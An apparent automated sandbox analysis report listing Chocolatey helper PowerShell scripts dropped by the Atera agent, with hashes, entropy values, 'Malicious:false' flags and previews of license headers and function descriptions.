                                                                                                                                                                                                                                        SHA-256:7095FB2F3F44FEE977D3B53DEE93B952D04325108B090F5F7E8503F758C27F18
                                                                                                                                                                                                                                        SHA-512:2D0B8C3345B6573F56A54D357BB700D83B3AB5A40DED0AA2DC5A40DAC0523DB86BBC5BAA10CB3B4B1785123B8F32CEC5A86F350AF315A2BFF6885C08BD77758F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChecksumValid {..<#...SYNOPSIS..Checks a file's checksum versus a passed checksum and checksum type......DESCRIPTION..Makes a determination if a file meets an expected checksum s

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10482
                                                                                                                                                                                                                                        Entropy (8bit):5.191184135569746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHphcdudY/xIVBO6zgV6ZlR86nFTDzH0sQsPbnJ8Yc9bTp05va:ctL+QGTqudY/xcBOSt3XHRJNva
                                                                                                                                                                                                                                        MD5:F740F29F0AC79C7E5BA69B1CF3E6DC74
                                                                                                                                                                                                                                        SHA1:8F609B5BDCCE295AEF29011858B31608D26E8E04
                                                                                                                                                                                                                                        SHA-256:550231F4568914C786BF3BDE0FF4897DCE761084D33CFA6D8FD462B34A779D88
                                                                                                                                                                                                                                        SHA-512:FC567A01086E8E6A55AAD1E3AEA0E9639E2F8C03399728A5421214E1E0CBF726A7D0F7422EBE3CE74C226F27C11C051760CDAD2AFBB5E69294152669929AB05A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyUnzip {..<#...SYNOPSIS..Unzips an archive file and returns the location for further processing......DESCRIPTION..This unzips files using the 7-zip command line tool 7z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16502
                                                                                                                                                                                                                                        Entropy (8bit):5.146477219224201
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHpWybOWetWKW3VjEve49W9cO1kazvJwKEDbrj:ctL+QGPnetZ2EvXOlybrj
                                                                                                                                                                                                                                        MD5:CD302EF4E080D330A9DEAFA584C049AB
                                                                                                                                                                                                                                        SHA1:53B98CD3540A35FF32E1E6DDA2BB3F786FAE23ED
                                                                                                                                                                                                                                        SHA-256:3E18EB6CF646474E9259E932679E04DF1CC4322E2E354A770F32A0F7D67C72A4
                                                                                                                                                                                                                                        SHA-512:B0D74A92DFB16CBE799C781CAD2702C6932BA5B15A28EE5AF2FB56A4CFA4317B2347AF227A9484A0536CC95674CFBB89343E3955C2457AFD0D23854963D85BFC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyWebFile {..<#...SYNOPSIS..Downloads a file from the internets......DESCRIPTION..This will download a file from a url, tracking with a progress bar...It returns the file

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4123
                                                                                                                                                                                                                                        Entropy (8bit):5.288017280806032
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKotzWfp1Vr4MeAWMK13MqhPTv6ee5:cSyL+QGXH3Gp1VrSAQ3Mqg
                                                                                                                                                                                                                                        MD5:E564E914B196DAC040D08110D5D8718D
                                                                                                                                                                                                                                        SHA1:2532E9010D3A67A6FF345F2564A843800DC59CBB
                                                                                                                                                                                                                                        SHA-256:5AF7D3DC6B44142492B9E31A69352873D43D570D7D4718B2942A67D3D6180951
                                                                                                                                                                                                                                        SHA-512:06127E83C2BBDA160183D3DC5E51E652E2011C760B561DA639BDF847F085DB3E93E3C5F0B5C12C1114D228C3882E0FBC81418CF9CAA3C04FA837CE0A68574EFF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariable {..<#...SYNOPSIS..Gets an Environment Variable......DESCRIPTION..This will will get an environment variable based on the variable name..and scope while accoun

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2060
                                                                                                                                                                                                                                        Entropy (8bit):5.165746374691896
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMfcM1KIcoCtJS0RjhYigLiO:cSyL+4pGXHFKovCZWdQ
                                                                                                                                                                                                                                        MD5:D4DF76AC88518CA76BD5EC4605C55781
                                                                                                                                                                                                                                        SHA1:8B540089E4B1AF183CF9D8053043BD4252A8B2BB
                                                                                                                                                                                                                                        SHA-256:F73E30026DC59EF1B1375FE869347BAE2E02BDC51117E17DD2717E7DE7F712F6
                                                                                                                                                                                                                                        SHA-512:BC37855DDEEF6BD3BECA66109F3EBE09B82409DD8EB1B6DEFC1ADCCEA397356FB521BC22CA8B7D34A418EB6EAAC1E9B277CBD333251A149C46E104980FBF3071
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariableNames([System.EnvironmentVariableTarget] $Scope) {..<#...SYNOPSIS..Gets all environment variable names......DESCRIPTION..Provides a list of environment variabl

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-FtpFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7947
                                                                                                                                                                                                                                        Entropy (8bit):5.051645140778019
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:3SfwB1bbVPeBlvvJ5nli61sre8+007Oc+pbkmzqMd0yiW:3SfwHBgPd04OHpb3yW
                                                                                                                                                                                                                                        MD5:15DDE6C604B0BD3A0C1F569BAAC9B91B
                                                                                                                                                                                                                                        SHA1:9366C80608BB20A9CFD84AD574D561E481F9B0B8
                                                                                                                                                                                                                                        SHA-256:12FA2C7D770F0AF308D535A3523903F730A2121B2C72D05A9EA7BF9E5AA27C72
                                                                                                                                                                                                                                        SHA-512:B2DFDC3BC98ADE4486A0CC30E3124F16F9788D6DD8214DF4C6460FE818CFC645EF36FAF03AC99490D0BFEA6A0FDA8646845E9A23C464B13C486E8C8677913339
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.## Get-FtpFile..##############################################################################################################..## Downloads a file from ftp..## Some code from http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershell..## Additional functionality emulated from http://poshcode.org/417 (Get-WebFile)..## Written by Stephen C. Austin, Pwnt & Co. http://pwnt.co..##############################################################################################################..## Additional functionality added by Chocolatey Team / Chocolatey Contributors..## - Proxy..## - Better error handling..## - Inline documentation..## - Cmdlet conversion..## - Closing request/response and cleanup..## - Request / ReadWriteResponse Timeouts..##############################################################################################################..function Get-FtpFile {..<#...SYNOPSIS..Downloads a file from a File Transfter Protocol (FTP) l

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-OSArchitectureWidth.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2930
                                                                                                                                                                                                                                        Entropy (8bit):5.220783998189862
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMBigsroWdBWuzonabOsEahaqTtYkkdrO57XMp0o3jMoF7d3:cSyL+4pGXHFKoySxwn0zhaqT6r8Bo3j9
                                                                                                                                                                                                                                        MD5:5CE49B0DAF505DBCDA1D6E3B21FCCE88
                                                                                                                                                                                                                                        SHA1:68B5493F4C79FA198269A211B4B3A981FE06CEBA
                                                                                                                                                                                                                                        SHA-256:94DC6FBE584FE5DA6333E44F4F0EFA88254A7F78EAC1DE593683A50F33EECD96
                                                                                                                                                                                                                                        SHA-512:580AF8026407DC485BDFBDED106CF3DFD778A900504BF5A66AE1B14C9A1A7F1F80E7E888A26B42446091D40B61E4F3250E3D1CBD661C3557B05A3275E9522545
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-OSArchitectureWidth {..<#...SYNOPSIS..Get the operating system architecture address width......DESCRIPTION..This will return the system architecture address width (probably 32 or

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-PackageParameters.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7233
                                                                                                                                                                                                                                        Entropy (8bit):5.212503071724739
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyhrzQGXHHyN604JEtV/OyU/rFPV/LA+N/IwX/G3:cthrzQGA4JEArFPZLAkIwX8
                                                                                                                                                                                                                                        MD5:5CB5EC1EFD682DB6B436388E63841227
                                                                                                                                                                                                                                        SHA1:15234AFA9F45671CC89DF05DF9371F125213F5CE
                                                                                                                                                                                                                                        SHA-256:F34917832A7347060BC1B8DCDD05FD4E5AA1672DBFA6A81DBABE9A978AD4B3A2
                                                                                                                                                                                                                                        SHA-512:9E7D279B3CF9D737F2D114085FCBBD6AD13F681BF1365109AD20D9998EF20EA28E7703337E12BA5F350BE4CC37B35E5C7A7ED57FF45896D40B3F628672ED2096
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2016 - 2017 Original authors from https://github.com/chocolatey/chocolatey-coreteampackages..# Copyright . 2016 Miodrag Mili. - https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# special thanks to the Core Community Maintainers team and their work..# on the Get-PackageParameters function that is in the..# `chocolatey-core.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ToolsLocation.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3761
                                                                                                                                                                                                                                        Entropy (8bit):4.908858016895155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyp4pGXHFKo/jFKv+Q/IT00CSZL5eFYE/:cSypQGXHNRKvGT06L5eFYk
                                                                                                                                                                                                                                        MD5:D248C571C9B745CD77B6FF016245AFDA
                                                                                                                                                                                                                                        SHA1:476E0532FA0972690A43C1227C1E50FED6916064
                                                                                                                                                                                                                                        SHA-256:64CA4E5DF3587448659E052FACF69D47DAB48845929A1D21C386812DEE25285D
                                                                                                                                                                                                                                        SHA-512:114DF561CFD26AEB535B7804AE5C978F1850EA07F609C502BC745683229E06FB7AD76F04F610CC2A2CE4890FCAFC089202BD96BCA146745CCC6226E0FD63C91E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ToolsLocation {..<#...SYNOPSIS..Gets the top level location for tools/software installed outside of..package folders......DESCRIPTION..Creates or uses an environment variable that a user can control to..communicate with packages about where they would like software that is..not installed through native installer

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-UACEnabled.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1891
                                                                                                                                                                                                                                        Entropy (8bit):5.216117200464903
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMo/f0n9WZH78+0tJwHKlkn:cSyL+4pGXHFKozeM6+0kHEkn
                                                                                                                                                                                                                                        MD5:D7810321DDE3F67CCD37E6280D9FC5EA
                                                                                                                                                                                                                                        SHA1:052053BEE38A1F79785B40290CC872E4540D6331
                                                                                                                                                                                                                                        SHA-256:AC936BF04E1890321EEFC321A82F353BECA22633EB0F72DC497F8CF5F45EC99C
                                                                                                                                                                                                                                        SHA-512:F365E429C4D013D8C0394575FBEC031AFD03991FC8019860795EC3D8DD7CAB8D43C539FCAED0A04C5C6979E5046166CAD5E2F8D6A3CD5688D78AB17411C0BEDE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UACEnabled {..<#...SYNOPSIS..Determines if UAC (User Account Control) is turned on or off......DESCRIPTION..This is a low level function used by Chocolatey to decide whether..pro

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-UninstallRegistryKey.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6009
                                                                                                                                                                                                                                        Entropy (8bit):5.183782879831246
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyp4aXHFKo+l0Y9WqbUqcN1bLZAiwSVg2SHBjqmnn3seTIIe8bMH/g4F267rTli:cSypHXHyJvIXN1miVVoTIyJ6rT25
                                                                                                                                                                                                                                        MD5:8BDD492FD645ABC85E1A76BFB3BB9306
                                                                                                                                                                                                                                        SHA1:0B84BACF023719AAF1F52544FDA4B1542E3FBD5D
                                                                                                                                                                                                                                        SHA-256:2F11852DCC6C4C45BAA7355A5ABA501846A96DA75B0332A5347D382D876F94C8
                                                                                                                                                                                                                                        SHA-512:D9B1E7457B71F0DD930C7DD10076FCCB75E2F6AE6E7129FC417F629DE63C34B8448D7F52D733B476BBAC39C2A758444F462CA8839987C6E3C178C592F6212EEB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UninstallRegistryKey {..<#...SYNOPSIS..Retrieve registry key(s) for system-installed applications from an..exact or wildcard search......DESCRIPTION..This function will attempt to retrieve a matching registry key for an..already installed application, usually to be used with a..chocolateyUninstall.ps1 automatio

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-VirusCheckValid.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1815
                                                                                                                                                                                                                                        Entropy (8bit):5.188333753523367
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSy93R2O+4Ipg8AQyU0E+SlHQk1GpsLA9NIrd+aL85TiV+hT0hCmTxGz1echWtLt:cSyL+4pe90AlH31KoMCoaYp4AmVMMth
                                                                                                                                                                                                                                        MD5:FE5456E477F7D5131DD448942A3AD961
                                                                                                                                                                                                                                        SHA1:C8FDE141D6D5E6713A13C2A6DF55A07E2BB187E5
                                                                                                                                                                                                                                        SHA-256:88D9BA7C04A62D34EDB6A913CE00463FBDC82A2986AC9F459E04B75BC1728922
                                                                                                                                                                                                                                        SHA-512:261AA5F14F8A98638869A509844ECDEE1286B97B131D89A3B901AC2B40F09066CBC1C073D32DDE3EA160FB2C2F971BA0D6785981C6C180BEC5DC4F0D6029421E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-VirusCheckValid {..<#...SYNOPSIS..Used in Pro/Business editions. Runtime virus check against downloaded..resources......DESCRIPTION..Run a runtime malware check against downloade

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12827
                                                                                                                                                                                                                                        Entropy (8bit):5.065872919066253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:eBbyvHpL71ZxDlVWfYuuiy5nevc/n30zrryM3zE2LoQY+VUqZA:eBgptZxOQt10zrryMFLdYWU6A
                                                                                                                                                                                                                                        MD5:76013037F6A0E623C39D9D07C20D3BAE
                                                                                                                                                                                                                                        SHA1:7DC87082B4D2AB36AB08D6826CA209E2CD7C5694
                                                                                                                                                                                                                                        SHA-256:8FCCA5AA5F0F631FBE9D319EB13C5A282F5DBC1D8D4BC0852021BE0524A6DD39
                                                                                                                                                                                                                                        SHA-512:9D92B42EEBEE276522103D23EF646DFEC32630E97673B816F51841948C6DD9DA89A89B897D515CFFECED7D14174EF83110FFA4B0BA9F64E1738F083592E696F0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# http://poshcode.org/417..## Get-WebFile (aka wget for PowerShell)..##############################################################################################################..## Downloads a file or page from the web..## History:..## v3.6 - Add -Passthru switch to output TEXT files..## v3.5 - Add -Quiet switch to turn off the progress reports .....## v3.4 - Add progress report for files which don't report size..## v3.3 - Add progress report for files which report their size..## v3.2 - Use the pure Stream object because StreamWriter is based on TextWriter:..## it was messing up binary files, and making mistakes with extended characters in text..## v3.1 - Unwrap the filename when it has quotes around it..## v3 - rewritten completely using HttpWebRequest + HttpWebResponse to figure out the file name, if possible..## v2 - adds a ton of parsing to make the output pretty..## added measuring the scripts involved in the command, (uses Tokenizer)..#####################

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebFileName.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9247
                                                                                                                                                                                                                                        Entropy (8bit):5.07010917787166
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSypQGXHQybOdQVeBAmZZ8mumtrUy5nF2wnK0u/obu5OyDucYhr:ctpQG3G1vPS0uQZ2uH
                                                                                                                                                                                                                                        MD5:CCEF9317BA6E4AD2C5F9ADA169DE64E3
                                                                                                                                                                                                                                        SHA1:0B03F562CC75CDFB7CC184DA8B8E6BA73A6256A7
                                                                                                                                                                                                                                        SHA-256:1D10AEC25CE4A010B338041862F485BDA47494A3A0EE154BBA49F48BCFCF0D68
                                                                                                                                                                                                                                        SHA-512:922BCEFDCC76A32EE81AB0610BA1E256A228075084DE5A85F11D3B67D62F496A86BD59BE3AA5E00EC24E5A2805AD4199D5D38CD05D92D1BBC43F333FBE924D30
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
